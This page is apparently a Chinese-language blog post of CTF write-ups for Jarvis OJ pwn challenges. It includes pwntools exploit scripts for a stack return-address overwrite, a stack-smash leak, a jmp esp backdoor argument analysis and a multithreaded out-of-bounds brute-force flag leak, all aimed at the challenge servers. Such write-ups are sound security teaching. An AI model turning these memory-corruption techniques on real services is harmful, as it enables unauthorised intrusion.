<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '6.3.0',
    sidebar: {"position":"right","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="部分pwn题--（上）">
<meta name="keywords" content="ctf,Jarvis OJ,writeup,pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="Jarvis OJ -- pwn题（上）">
<meta property="og:url" content="https://4Five.github.io/2017/11/24/Jarvis_pwn_1/index.html">
<meta property="og:site_name" content="4Five&#39;S BLOG">
<meta property="og:description" content="部分pwn题--（上）">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/e886858b289b627b7e85b787d6e62d7d.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/48c1658fd022b0fe3a4a7a4c2ad5df48.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/ea5472bc74133aa37aaebf032007b534.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/4fb530bb5ec6e515cc52c9f901c87a89.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/48b172b5d8e395ca4c8de8fb79caee90.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/db238902d0cbe530a21f293f4143f4ff.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/51348affd76a29f7f8b35ff2874cf737.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/c4c832daf642fcabe67b1ab6126c6c05.png">
<meta property="og:image" content="http://oztni9daw.bkt.clouddn.com/c309eaa732e1b4f02bd3f30288ef20f0.png">
<meta property="og:updated_time" content="2017-12-08T01:10:45.992Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Jarvis OJ -- pwn题（上）">
<meta name="twitter:description" content="部分pwn题--（上）">
<meta name="twitter:image" content="http://oztni9daw.bkt.clouddn.com/e886858b289b627b7e85b787d6e62d7d.png">






  <link rel="canonical" href="https://4Five.github.io/2017/11/24/Jarvis_pwn_1/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Jarvis OJ -- pwn题（上） | 4Five'S BLOG</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">4Five'S BLOG</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />Accueil</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />A propos</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />Tags</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />Categories</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />Archives</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://4Five.github.io/2017/11/24/Jarvis_pwn_1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="4Five">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="4Five'S BLOG">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Jarvis OJ -- pwn题（上）
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posté le</span>
              

              
                
              

              <time title="Post created: 2017-11-24 16:29:24" itemprop="dateCreated datePublished" datetime="2017-11-24T16:29:24+08:00">2017-11-24</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Updated at: 2017-12-08 09:10:45" itemprop="dateModified" datetime="2017-12-08T09:10:45+08:00">2017-12-08</time>
              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/Jarvis-OJ/" itemprop="url" rel="index"><span itemprop="name">Jarvis OJ</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          
              <div class="post-description">部分pwn题--（上）</div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="Tell-Me-Something"><a href="#Tell-Me-Something" class="headerlink" title="Tell Me Something"></a>Tell Me Something</h1><blockquote>
<p>Do you have something to tell me?</p>
<p>nc pwn.jarvisoj.com 9876</p>
</blockquote>
<p>签到题，ida打开看到个flag函数，直接覆盖返回地址，懒的算溢出位数，直接send一堆过去吧<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">s = remote(&apos;pwn.jarvisoj.com&apos;, 9876)</span><br><span class="line">s.sendline(p64(0x0400620) * 500)</span><br><span class="line">s.recv()</span><br><span class="line"># PCTF&#123;This_is_J4st_Begin&#125;</span><br></pre></td></tr></table></figure></p>
<h1 id="Smashes"><a href="#Smashes" class="headerlink" title="Smashes"></a>Smashes</h1><blockquote>
<p>Smashes, try your best to smash!!!</p>
<p>nc pwn.jarvisoj.com 9877</p>
</blockquote>
<p>这题服了，看了几小时ida，没看出可以利用什么，原来还能利用报错来get flag，涨姿势了.<br><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/stackoverflow/others.html#stack-smash" target="_blank" rel="noopener">Stack smash</a></p>
<p>最骚的是原以为flag肯定会被覆盖成其他的，得想个办法绕过，然后看到了这句话，牛逼</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/e886858b289b627b7e85b787d6e62d7d.png" alt="sbl"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">sh = remote(&apos;pwn.jarvisoj.com&apos;, 9877)</span><br><span class="line">argv_addr = 0x00007fffffffdc58</span><br><span class="line">name_addr = 0x7fffffffda40</span><br><span class="line">flag_addr = 0x400d20</span><br><span class="line">payload = &apos;a&apos; * (argv_addr - name_addr) + p64(flag_addr)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(&apos;&apos;)</span><br><span class="line">print sh.recvall()</span><br><span class="line"># PCTF&#123;57dErr_Smasher_good_work!&#125;</span><br></pre></td></tr></table></figure>
<h1 id="Backdoor"><a href="#Backdoor" class="headerlink" title="Backdoor"></a>Backdoor</h1><blockquote>
<p>这是一个有后门的程序，有个参数可以触发该程序执行后门操作，请找到这个参数，并提交其SHA256摘要。(小写)</p>
<p>FLAG：PCTF{参数的sha256}</p>
</blockquote>
<p>给了个32位的pe文件，mac固态小，没装win虚拟机，结合别人wp给出自己的分析过程</p>
<p>首先ida打开看main函数</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/48c1658fd022b0fe3a4a7a4c2ad5df48.png" alt="ida1"></p>
<p>看到main的第二个参数a2（ida点一下变量后，黄色标记的），即argv，因为题目说的有个参数触发，参数一般是通过argv取的，这里把a2+4即a2[1]经过一系列变换，赋值给了v13，看函数名可以猜到是在做unicode和char的变换，因为a2[0]是此pe文件的文件名，所以这里v13就代表了运行传入的第一个参数，再看看v13干了什么</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/ea5472bc74133aa37aaebf032007b534.png" alt="ida2"></p>
<p>v13先异或等于0x6443u，然后变成了一个代表长度的值，把dest前面赋值为65即’A’，dest[v13]赋值为0x7FFA4512，据说是windows上一个万能的 <code>jmp esp</code>（几乎所有平台这个地址上都是jmp esp），然后这个dest可以看ida上面是 <code>char Dest[2]</code>，所以这里可以通过参数控制这个<code>jmp esp</code>溢出到某一个函数的返回地址，从而改变程序的控制流去执行此时esp上地址的内容，应该就是题目里面说的backdoor操作，那么在哪里溢出呢，看到dest在最后那里，被当做参数传入了sub_401000，跟进去</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/4fb530bb5ec6e515cc52c9f901c87a89.png" alt="ida3"></p>
<p>这里的source就是刚才传进来的source，strcpy把source复制给dest，而这个函数的局部变量dest也是 <code>char Dest[2]</code>，所以控制我们的<code>jmp esp</code>把sub_401000函数的返回地址覆盖了就行，而这里Dest可以从右边看出来是[ebp-20h]，[ebp]上是函数进来时<code>push esp</code>的值，所以这里函数的返回地址是在dest的24h偏移处，当然以上纯属肉眼猜测，没有实际调试，实际可能栈上布局不同</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">In [1]: from pwn import *</span><br><span class="line"></span><br><span class="line">In [2]: import hashlib</span><br><span class="line"></span><br><span class="line">In [3]: p32(0x24 ^ 0x6443)</span><br><span class="line">Out[3]: &apos;gd\x00\x00&apos;</span><br><span class="line"># p32打包出来了的有4个字节，最后的00多余了，如果sha256的p32的值，结果不一样</span><br><span class="line"></span><br><span class="line">In [4]: p16(0x24 ^ 0x6443)</span><br><span class="line">Out[4]: &apos;gd&apos;</span><br><span class="line"></span><br><span class="line">In [5]: hashlib.sha256(p16(0x24 ^ 0x6443)).hexdigest()</span><br><span class="line">Out[5]: &apos;2b88144311832d59ef138600c90be12a821c7cf01a9dc56a925893325c0af99f&apos;</span><br><span class="line"></span><br><span class="line"># PCTF&#123;2b88144311832d59ef138600c90be12a821c7cf01a9dc56a925893325c0af99f&#125;</span><br></pre></td></tr></table></figure>
<h1 id="Guess"><a href="#Guess" class="headerlink" title="Guess"></a>Guess</h1><blockquote>
<p>你猜，你猜，你猜不到，你猜对了就给你flag</p>
<p>nc pwn.jarvisoj.com 9878</p>
</blockquote>
<p>ida看main函数，监听9999端口</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/48b172b5d8e395ca4c8de8fb79caee90.png" alt="ida"></p>
<p>nc上去看看干什么的</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/db238902d0cbe530a21f293f4143f4ff.png" alt="nc"></p>
<p>接着看ida的handle怎么处理的</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/51348affd76a29f7f8b35ff2874cf737.png" alt="ida"></p>
<p>跟进is_flag_correct看看</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/c4c832daf642fcabe67b1ab6126c6c05.png" alt="ida"></p>
<p>乍一看没有什么溢出，但是这里是下标越界，如果<code>bin_by_hex[flag_hex[2 * i]]</code>中<code>flag_hex[2 * i]</code>是个负数的话，就能访问栈上内容，看下栈布局</p>
<p><img src="http://oztni9daw.bkt.clouddn.com/c309eaa732e1b4f02bd3f30288ef20f0.png" alt="stack"></p>
<p>可以看到bin_by_hex上就是等会比较的flag值，所以我们guess提交负数上去就能取到flag值了，即-40h，-39h，-38h······-eh这样</p>
<p>但是，输入的什么并不会返回给我们，所以需要逐位爆破，网上的多线程版本</p>
<blockquote>
<p>多线程需要上线程锁，网上这个脚本没有，所以跑出来有很多0的就是多线程的问题了，但是我加线程锁后，爆破的又慢的一比，所以最好的做法是多次运行这个脚步，然后把每次的结果中的非0的字符结合一下，如果某字符每一次都是0，就说明这里真的是0。说白了，就是把每次得到的flag类似<code>|</code>（与）操作一下，尽可能换掉’0’的字符</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">import threading</span><br><span class="line"></span><br><span class="line">def e(n):</span><br><span class="line">    return b.encode(&apos;hex&apos;)</span><br><span class="line"></span><br><span class="line">flag = [&apos;*&apos;] * 50</span><br><span class="line"></span><br><span class="line">def pwn(leak):</span><br><span class="line">    global flag</span><br><span class="line"></span><br><span class="line">    rr = 1</span><br><span class="line">    if rr:</span><br><span class="line">        cn = remote(&apos;pwn.jarvisoj.com&apos;, 9878)</span><br><span class="line">    else:</span><br><span class="line">        cn = remote(&apos;127.0.0.1&apos;, 9999)</span><br><span class="line"></span><br><span class="line">    cn.recv()</span><br><span class="line"></span><br><span class="line">    raw_pay = &apos;&apos;</span><br><span class="line">    for i in range(50):</span><br><span class="line">        raw_pay += &apos;0&apos;</span><br><span class="line">        raw_pay += chr(0x40 + 128 + i)</span><br><span class="line"></span><br><span class="line">    for ch in range(128):</span><br><span class="line">        if chr(ch).isalnum() or chr(ch) == &apos;&#123;&apos; or chr(ch) == &apos;&#125;&apos;:</span><br><span class="line">            pay = list(raw_pay)</span><br><span class="line">            pay[2 * leak] = chr(ch).encode(&apos;hex&apos;)[0]</span><br><span class="line">            pay[2 * leak + 1] = chr(ch).encode(&apos;hex&apos;)[1]</span><br><span class="line">            pay = &apos;&apos;.join(pay)</span><br><span class="line">            cn.sendline(pay)</span><br><span class="line">            ret = cn.recvline()</span><br><span class="line">            cn.recv()</span><br><span class="line">            if ret != &apos;Nope.\n&apos;:</span><br><span class="line">                flag[leak] = chr(ch)</span><br><span class="line">                print chr(ch),</span><br><span class="line">                break</span><br><span class="line">    cn.close()</span><br><span class="line"></span><br><span class="line">t = [0] * 50</span><br><span class="line">for i in range(50):</span><br><span class="line">    t[i] = threading.Thread(target=pwn, args=(i,))</span><br><span class="line">    t[i].start()</span><br><span class="line"></span><br><span class="line">for i in range(50):</span><br><span class="line">    t[i].join()</span><br><span class="line"></span><br><span class="line">print &quot;\n\nfind flag:&quot; + &apos;&apos;.join(flag)</span><br><span class="line"># PCTF&#123;49d4310a1085875567932651e559e153cfc8bd27b431&#125;</span><br></pre></td></tr></table></figure>
<h1 id="Guestbook2"><a href="#Guestbook2" class="headerlink" title="Guestbook2"></a>Guestbook2</h1><blockquote>
<p>听说guestbook1很快被人日穿了，出题人表示不服，于是对Guestbook进行了升级，自以为写的很科学~~大家一起鉴定一下。</p>
<p>nc pwn.jarvisoj.com 9879</p>
</blockquote>
<p>这题不会做了，又找不到wp，先放着，以后填坑</p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/Jarvis-OJ/" rel="tag"># Jarvis OJ</a>
          
            <a href="/tags/writeup/" rel="tag"># writeup</a>
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/11/22/Jarvis_basic/" rel="next" title="Jarvis OJ -- BASIC 全关卡writeup">
                <i class="fa fa-chevron-left"></i> Jarvis OJ -- BASIC 全关卡writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/11/27/hxb/" rel="prev" title="湖湘杯部分题writeup">
                湖湘杯部分题writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table Des Matières
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Ensemble
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">4Five</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">18</span>
                    <span class="site-state-item-name">articles</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">6</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">18</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Tell-Me-Something"><span class="nav-number">1.</span> <span class="nav-text">Tell Me Something</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Smashes"><span class="nav-number">2.</span> <span class="nav-text">Smashes</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Backdoor"><span class="nav-number">3.</span> <span class="nav-text">Backdoor</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Guess"><span class="nav-number">4.</span> <span class="nav-text">Guess</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Guestbook2"><span class="nav-number">5.</span> <span class="nav-text">Guestbook2</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">4Five</span>

  

  
</div>




  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> v3.4.4</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Thème &mdash; <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Gemini</a> v6.3.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


















  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/canvas_lines.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



  





  










  





  

  

  

  

  
  

  

  

  

  

  

</body>
</html>
